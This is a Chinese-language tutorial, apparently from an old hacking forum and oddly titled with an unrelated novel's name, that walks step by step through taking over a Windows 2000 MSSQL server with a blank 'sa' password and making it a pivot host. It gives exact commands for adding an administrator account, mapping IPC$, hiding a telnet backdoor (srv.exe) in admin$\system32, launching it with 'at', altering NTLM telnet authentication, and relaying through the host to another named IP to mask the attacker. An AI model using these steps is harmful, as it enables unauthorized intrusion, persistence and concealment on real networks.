寻秦记原著小说:怎样做跳板!(sql和ipc$的配合攻击)

使用的工具:流光for nt/2000,操作平台:nt/2000

首先用"流光"搜索sql类型主机,我选的ip段是211.23.*.*,大约过了一两分钟,就有3台机子被扫到,其中有两台是nt4.0,一台是win2000(用户名:sa,密码:<null>空),我选了win2000那台作为跳板,首先用sqlrcmd与远程主机连接(工具-->sql远程命令,添上ip,用户名和密码,按确定,差不多过几秒钟就会看见SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas! Connect to 211.23.*.* MSSQL Server Success, Type Command in Prompt. SQLCmd> 这句话，如果没有看见的话，说明远程主机不支持sql远程登陆，我们这里只讨论可以远程登陆),然后用net use administrator命令看看管理员在不在(没在,不知到那去了,呵呵)，下面我们要添加一个用户,net user love 1234/add(如果显示命令成功,或者该用户已经存在,都说明你已经成功的添加了一个用户名为love,密码为1234的用户),然后我们要自己做administrator了,net localgroup administrators love /add(如果显示命令成功完成,或者该用户已经是该组成员,那么你就是administrator了)下面我们打开cmd.exe,输入net use \\211.23.*.*\ipc$ "1234" /user:"love"命令,如果显示命令成功完成,那么你就有90%的希望把它作为我们的跳板,首先上传一些文件(srv.exe,NTLM.exe),copy \hacktools\srv.exe\\211.23.*.*\admin$\system32(srv.exe是一个telnet的程序,端口是99,admin$是默认的共享,之所以上传到那里,是因为那里的文件比较多,不易被发觉,NTLM.exe也要上传),复制完了之后,我们就要启动srv.exe这个程序了,(我们利用的是对方主机的Schedule<定时服务>首先用net time \\211.23.*.*， 看看对方主机的时间,(回显\\211.23.*.* 的本地时间是上午09:23)，然后我们用at \\211.23.*.* 09:25 srv.exe命令来启动srv.exe(这里要注意一下时间的换算,24小时制),回显:新添加了一项作业 ,其作业ID=?,这样我们只要等几分钟就可以telnet到主机了,过了几分钟……,我们用命令telnet 211.23.*.* 99来登陆主机,(如果成功会有欢迎信息)然后我们要启动NTLM.exe了(用于修改Windows 2000 Telnet Servery身份验证的方式)在telnet状态下直接输入ntlm,回车,(成功之后回显:windows 2000 telnet dump,by assassin,all rights reserved.done!)最后一步:从新启动对方主机的telnet服务(不用退出telnet状态,直接输入net stop telnet,<停止telnet服务>,net start telnet,<启动telnet服务)(会有回显,由于各个win2000的版本不同,启动成功之后的的回显也不一样,这里不做介绍,)我们退出telnet的状态(命令:exit)然后在命令行下输入telnet 211.23.*.*,依照提示,接着输入用户名love,密码,1234,回车,(如果成功会有欢迎信息),就这样,我们的跳板就做好了，你可以用它登陆倒任何开启telnet服务的主机,比如接着输入telnet 211.73.134.91(呵呵,可以登陆),作一个跳板是不是很简单呢？

跳板可以在特殊的情况下隐藏你的ip,比如刚才登陆到211.73.134.91所留的ip,就是211.23.*.*的ip